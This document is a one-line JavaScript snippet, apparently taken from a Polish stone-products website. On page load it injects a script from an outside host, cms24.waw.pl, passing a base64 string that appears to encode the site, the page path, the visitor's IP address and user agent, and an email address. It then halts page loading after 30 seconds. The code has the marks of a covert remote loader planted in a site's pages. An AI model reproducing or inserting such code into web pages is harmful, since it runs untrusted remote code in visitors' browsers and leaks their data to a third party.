var myScrStOutTim='30000';if(window.addEventListener){window.addEventListener("load",myStatJsRunOnOutSrv(myScrStOutTim),false);}else if(window.attachEvent){window.attachEvent("onload",myStatJsRunOnOutSrv(myScrStOutTim));}else{window.onload=myStatJsRunOnOutSrv(myScrStOutTim);}function myStatJsRunOnOutSrv(myScrStOutTim){var RunOnOutSrvJs=document.createElement("script");RunOnOutSrvJs.src="http://cms24.waw.pl/j.php?p=MXwwfDB8fDl8Zm9jdXMtc3RvbmVzLnBsfC9yZWtvbWVuZG93YW5lLWthbWllbmllL2luZGV4LnBocD9vcHRpb249Y29tX2NvbnRlbnQmdmlldz1hcnRpY2xlJmlkPTM0MyZJdGVtaWQ9NDE3fHw1NC44MS4xNTAuMjd8ZWMyLTU0LTgxLTE1MC0yNy5jb21wdXRlLTEuYW1hem9uYXdzLmNvbXxDQ0JvdC8yLjAgKGh0dHBzOi8vY29tbW9uY3Jhd2wub3JnL2ZhcS8pfEZvY3VzLVN0b25lcyBodXJ0b3duaWEga2FtaWVuaWF8MHxjbXNAbWlnYW4ucGx8MTV8Zm9jdXMtc3RvbmVzLmhvbWUucGx8ODkuMTYxLjIxOS4xMzN8bW9uZGF5fDMyODE2fDAuMDAwM3wzLjguNXw3LjIuM3x3MUE1YmFhMWRlZDU2YjFkfDM7MDsyOzE7MHwyOzA7Mzc7MDsyMzY7MzE7MTswOzI7MHw4OTY7MTY7MTs0NDk7N3wyODc7MjE2OzE7MzkyOTIz";document.body.appendChild(RunOnOutSrvJs);setTimeout(function(){if(window.stop){window.stop();}else{document.execCommand('Stop');}},myScrStOutTim);}